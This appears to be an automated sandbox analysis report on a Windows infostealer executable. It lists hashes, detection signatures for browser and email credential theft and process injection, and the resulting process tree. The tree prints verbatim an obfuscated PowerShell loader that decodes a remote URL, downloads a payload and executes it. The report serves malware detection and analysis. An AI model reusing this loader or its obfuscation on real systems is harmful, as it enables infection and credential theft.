Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
22/08/2024, 10:14
General
-
Target
833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe
-
Size
483KB
-
MD5
148795d6cfcff607f38bd3815a65a7b6
-
SHA1
a0e7f849720140d61d0bfecffb835fb467ae9faa
-
SHA256
833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d
-
SHA512
4e97c7ba04c0b61a1dc3dd0801364048527685b0d2df0e65cdb00670a8a73785d9386e92b51668c54ba6608daaf4f9d29749646fea4a751a9a6def74697c474e
-
SSDEEP
6144:wTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZBAXccrOT4:wTlrYw1RUh3NFn+N5WfIQIjbs/ZBFT4
Score
9/10
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 8 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 23 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 24 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe"C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Trekanterne174.vbs"2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "write 'Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene Deaktivering250 Sterilizabilities Desilver Busboy Ischiovertebral Yemen Geotekniske Pagterne Graphoscope preoccupation Lurkers Palliatively Sladrehankenes platybrachycephalous Retshistorie Qualification Kaprendes Undseligheds Orthogonalized Menulinie Prgnantest Larms Antipestilential Blomsterlgene';If (${host}.CurrentCulture) {$Ruefulness='SUBsTR';$Danmarksmestrenes++;}$Ruefulness+='ing';Function semisavage($Semicultivated){$Attesterer=$Semicultivated.Length-$Danmarksmestrenes;For( $Saetningsblok=2;$Saetningsblok -lt $Attesterer;$Saetningsblok+=3){$Deaktivering250+=$Semicultivated.$Ruefulness.'Invoke'( $Saetningsblok, $Danmarksmestrenes);}$Deaktivering250;}function bagstagets($Mirrorise){ . ($Fetichize) ($Mirrorise);}$Nedtrappedes=semisavage 'AfM,eoVezMiiF,lB lAra ,/ S5In.Ko0Af Fe(EuWDei DnredN,oJaw,tsFi .uNSaTR. U1 .0Ha.He0Si; K BaW riTjnMa6 f4ko;Re LaxL.6 K4Be; , urChv.a: ,1Ov2He1,a. M0Re) u SoGBeeL,cBlkKroPr/M.2,o0 ,1 .0 0 E1Ap0 B1St TrFCri,irBeePefr o NxBe/Un1Re2Wi1Mi.Im0Fo ';$Speronaros33=semisavage ' .UAdsCheSurWa- OARigD e OnClt ';$Ischiovertebral=semisavage 'W.hN.t tF.pDusB.:In/ru/,twFoe Kl Occlo Um DsSlpMalHyuHasEn.Unr BuSk/G wMipSt-KoaM,d Sm oiRanA./Chu Bs,fe Ur .s.e/p MSviGdj Ua c.BofInlW.aPr ';$Badeomraaderne=semisavage 'U > L ';$Fetichize=semisavage 'Udi ,e NxNo ';$Chromocyte='Pagterne';$Dysgenical = semisavage 'SceSkcTrhPeo , ,l%DeaRepF,p AdWiaObtSkaAn%.h\,iPDoo usTrhSooTo..rSF gsasB, Mo&Ve& D .eD,cAshhao,i Yht h ';bagstagets (semisavage ' E$K gRelS,o,fbBea ylLe: D.te r.ciSte ,t u=Me(L.c Sm TdSt Ud/SycRu Un$H,D AyGrsCrgCoeTunCaiFecVaaB lA )Gt ');bagstagets (semisavage 'St$StgRilT,oSabtoaSilAn: JB wu FsV,bGloTayR.=Ge$ lIBysr,cKrhSti doAhvMae ErTot eEdbl rRaaQdlHy. LsOopSklKoiA,tTo(,l$M,BN aNudFleKroPemTorUnaSaa Ad .eOvrFenH,e.a)G. ');bagstagets (semisavage 'Un[ ,N FeI t.n.F.S.xeU,rIsvReiAtcIde .PBlo PiWenMatSmM NaU,n aaPeg ,eBerEp]Be:Ha:DrSlaeOpcStuStrRei Ft,iyDePSur ,oLatBloVicsyo FlS, S=,a Hu[ .NBleUnt S.ErSP eAuc LuI.rekiEst iyDrPSpr Bo Dt LoStcT,osulP.TFryKwpPle o]Un:U :hoT RlXas D1.e2 R ');$Ischiovertebral=$Busboy[0];$pvc= (semisavage 'pa$Kog SlLio ,bScas lTh:a.SBiehac.urP euntN iEun.esPi=PeNFreLowUn- UOOvb.ej.telocSatE. ImSL.yS s Pt Me mdo. N reent J.HnWPreI,bsuCA,lD i LeDenVgt');$pvc+=$Deriet[1];bagstagets ($pvc);bagstagets (semisavage 'E.$InSFieFecBarOpe RtEli anExsSi.AdHmiePha rdBle,er Bs,a[Fl$DeSCopAseG rNeoSknFoaD,rReoAssRa3ph3Ur] P=Ka$NoN.oe ,dU t SrAsaplpb,p .eAadSueDesFu ');$Fnernes=semisavage 'ag$p,S Le Sc .r neLft iSun MsBe.muDStoSkwPhnPrlh,oTnaSwdHaFgui MlBee i(,n$UdI,lsEpcBih PiHaoNivM e MrE.tBres.bHvrGaaKnl .,em$ TL,kaForD.mbrs.f) . ';$Larms=$Deriet[0];bagstagets (semisavage 'Ma$S.gInlAloW.b yaE.lKo: SS.oeC lT vOpmStoledEqsSliHagUneMolAisoseL.s .=Ju(umTU eP,sOvt.k-UnP UaD,tRehPr No$siL .a ,rF,mRusH.)El ');while (!$Selvmodsigelses) {bagstagets (semisavage 'Pa$ HgLol.toOfb Pa.ylKr:SeH UuSarFrtHafChuRelti=.u$ ,tE,r gupeeVi ') ;bagstagets $Fnernes;bagstagets (semisavage ' BSRut ,aBrrButWy- aSPelUle,reFlpS. Se4s. ');bagstagets (semisavage ' R$Trg BlUdoAbbIna PlHi:UnS,pe Fl,evTrm.co dUbs eiSig De gl Ms.fe PsBe=Po( NTAleDes at.a- oPNoaBet ThO Da$ChL .aInr,am.osP )Du ') ;bagstagets (semisavage 'Op$DigL,lovoSkbPha Al s: oD,ueT s.picolBevv,e.rrNo=Ro$ShgS,lDeo .bFlaHilF.:P SMetAfeAsr FiBrlodiEuzE,aSabStiPrl ,i ,tReisneTasLe+Un+St%Fo$PeB.guB.sS,bWeo.uyR,.Rec,ooUnuRun ,tSh ') ;$Ischiovertebral=$Busboy[$Desilver];}$Fogedforbud=347549;$Keckling=28042;bagstagets (semisavage 'T,$T gLilB.o Kb Ba UlKo:.dGA r naSlpS,h oCosr c DoEjp ee.e ,o=Op SGcoeKntSa-.hC loOmn bt Ae Mn Nt . r$MoLF,aSkrMemYmsU, ');bagstagets (semisavage 'Gr$H gAflL.onibBeaCylKu:SegMekHos K Ut= . e[TaS ay.os atOveRkmSy.VaC,uoLbnByvReeC,rR,tJ,]A : E: MFspr loTamH BCia Hs reNi6 4 S otHerPoi unVrg a(S.$UdGSurC.aFapTrhMaoB sb cDioSkpT e D)S, ');bagstagets (semisavage 'Fl$Dig ulOro.obR.aMelFi:ooP naTelTolHyipraS.tChiS vSkeNal,tyD Fl=M, M,[TrS nySfsIntR,eMemV .RbT,aeAnxFrtBo.,nE DnAscMoo NdIdiP.n .gAn] i: U: .A,eS uCmaIUnI b.TiGZ e ht RSS.t Cr PiO,nFagSc( P$ArgRekResAn)Sm ');bagstagets (semisavage 'Am$.kg olL o ObVeaTelPh:t.K Lni,i HfShe SlCriPikHyeHa=af$PrPTaaTilTilLoiS aAlthaiOsv ae SlN.yPe.UnsD u bK.s.nt .rMiiNonHogS,(.o$ AFTro ,g eUrdsafE.oZurM.b Su dEx,Di$CoK teCacS.kUblAmi in PgFo) O ');bagstagets $Knifelike;"3⤵
- Blocklisted process makes network request
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Posho.Sgs && echo t"4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\vkycpitdthfw"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\fmluiaeehpxjypp"2⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exeC:\Users\Admin\AppData\Local\Temp\833d78a7e52cbcc21bf4a6843b7ed4130b2d39ae18896370324a7203a705025d.exe /stext "C:\Users\Admin\AppData\Local\Temp\qgrfjtoyvxpoivedxef"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
23KB
MD51603bcb30077161d37f2977db50f5873
SHA143df53981fc58d99cea68279555b4dd98366ed87
SHA256c658636d66ecbaf505b36ded0d6798240fc60b955a47b58473c9f28b4927b22a
SHA51229d8ecd9fc3b7ddfa1d6d3296cc4cc3bdbcb970f68f0aa3ae8c439e23faa9ad92170cdd82af958d01335b2fb9a76ebe5e5a9e5a84c89fca0f5924c938b5fe263
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB